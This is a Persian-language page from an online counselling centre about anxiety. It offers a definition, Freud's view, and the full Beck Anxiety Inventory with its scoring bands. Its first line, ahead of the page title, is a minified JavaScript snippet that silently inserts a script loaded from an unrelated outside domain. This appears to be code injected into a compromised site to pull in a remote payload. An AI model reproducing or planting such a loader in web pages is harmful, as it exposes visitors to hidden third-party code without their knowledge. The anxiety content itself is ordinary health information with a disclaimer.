;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); اضطراب | مرکز مشاوره آنلاین روان‌یاری

اضطراب

میزان پیشرفت خواندن شما

فهرست مطالب

اضطراب چیست؟

کلمه Anxiety  (اضطراب) از کلمه لاتین Anxietas که به معنای ناآرامی میباشد گرفته شده است و به حساسیت های جسمانی و روانی که در پاسخ به تهدید اعم از حقیقی یا خیالی که به وسیله ارگانیزم ابراز و ایجاد میشود اشاره میکند.

اضطراب
http://اضطراب

به اعتقاد اکثر روانشناسان اضطراب یک هیجان نامطلوب است که درجات مختلفی ازشدت فرد مضطرب  را در جهت هایی از حالت ناخوشایند برانگیخته میسازد،برانگیختگی حاصل از اضطراب به گونه ای است که میتواند عملکرد انسان را درجهت مثبت  و یا منفی متأثر ساخته و در نهایت موجبات افزایش و یا کاهش کارایی سازمان را فرآهم سازد.

اضطراب عامل اصلی و ریشه بسیاری از بیماری های روانی است.فروید معتقد است که اضطراب نقطه حساس و اصلی کلیه ی واکنش های عصبی و سرمنشاء تمام بیماری های روانی است. « درمکتب روانکاوی که فروید بنیانگذار آن میباشد  اضطراب نقش برجسته ای دارد.»فروید اضطراب را درد روانی نامیده است یعنی به همان صورت که اگر بدن دچار زخم،التهاب و بیماری گردد اولین نشانه آن به صورت تب ظاهرمیشود،اگر فرد از نظر روانی دچار مسئله و مشکل شود اولین نشانه آن به صورت اضطراب جلوه گر میشود.

اضطراب هم علت محسوب میشود و هم معلول:

یعنی علت بسیاری از بیماری های اضطراب است.همچنین هرگاه شخص با یک مسئله و مشکل روانی مواجه گردد که موجب به هم خوردن تعادل روانی وی گردد احساس اضطراب میکند.اضطراب یک احساس منتشر بسیارناخوشایند و اغلب مبهم دلواپسی است که با علایم تحریک دستگاه اتونوم مانند تنگی نفس،تپش قلب،تعریق،و…همراه است.اضطراب میتواند با کاهش تمرکز فرد و ایجاد اختلال در مهارت های مربوط به تصمیم گیری،در برقراری ارتباط درمانی درمانگر و بیماراختلال  ایجادکند و موجب کاهش تأثیر مداخله های روانشناختی شود.اضطراب معمولا به صورت یک حالت روانی و یا برانگیختگی شدید که ویژگی های اصلی آن شامل ترس،تردید و نگرانی مفرط است مشخص میگردد.ارزیابی علایم اضطراب در تشخیص گذاری ها و درمان از اهمیت خاصی برخوردار است.هرچند مقیاس های زیادی تاکنون،با توجه به دیدگاه های مختلف پدید آمده است،بررسی این مقیاس ها نشان میدهد که احتمالا مشکلاتی در مفهوم سازی نظری و ویژگی های روش شناختی آن ها وجوددارد.

اضطراب
http://اضطراب

با توجه به این مشکلات،آیرون بک و همکارانش(1990) پرسشنامه اضطراب بک BAI را معرفی کردند که به طور اختصاصی شدت علایم اضطراب بالینی را در افراد می سنجد.پرسشنامه اضطراب بک،یک پرسشنامه خودگزارشی است که برای اندازه گیری شدت اضطراب در نوجوانان و بزرگسالان تهیه شده است.

پرسشنامه Beck Anxiety Inventory :

لطفا هرعبارت را به دقت بخوانید و مشخص کنید در خلال هفته گذشته تا امروز چقدر از آن علامت در رنج بوده اید.

1.کرخی و گزگز شدن (مورمور شدن)

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

2.احساس داغی (گرما)

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

.3لرزش در پاها

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

4.ناتوانی درآرامش

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

  اختلال پرشنوایی چیست؟

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

5.ترس از وقوع حادثه بد

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

6.سرگیجه و منگی

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

7.تپش قلب و نفس نفس زدن

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

8.حالت متغیر (بی ثبات)

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

9.وحشت زده

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

10.عصبی

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

.11احساس خفگی

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

12.لرزش دست

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

.13لرزش بدن

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

14.ترس از دست دادن کنترل

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

15.به سختی نفس کشیدن

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

16.ترس از مردن

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

17.ترسیده (حالت ترس)

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

.18سوءهاضمه و ناراحتی درشکم

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

.19غش کردن (از حال رفتن)

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

20.سرخ شدن صورت

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

21.عرق کردن (نه در اثر گرما)

* اصلا :0

* خفیف (زیاد ناراحتم نکرده است) : 1

* متوسط (خیلی ناخوشایندبود اما تحمل کردم) : 2  

* شدید (نمی توانستم آن را تحمل کنم) : 3

نمره گذاری و تفسیر نمرات

حال شماره گزینه هایی را که انتخاب کرده اید را باهم جمع کنید.

درجه اضطراب                                   نمرات

هیچ یا کمترین حد                                 0-7  

خفیف                                                8-15

متوسط                                             16-25

شدید                                               26-63

اضطراب
http://اضطراب
Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.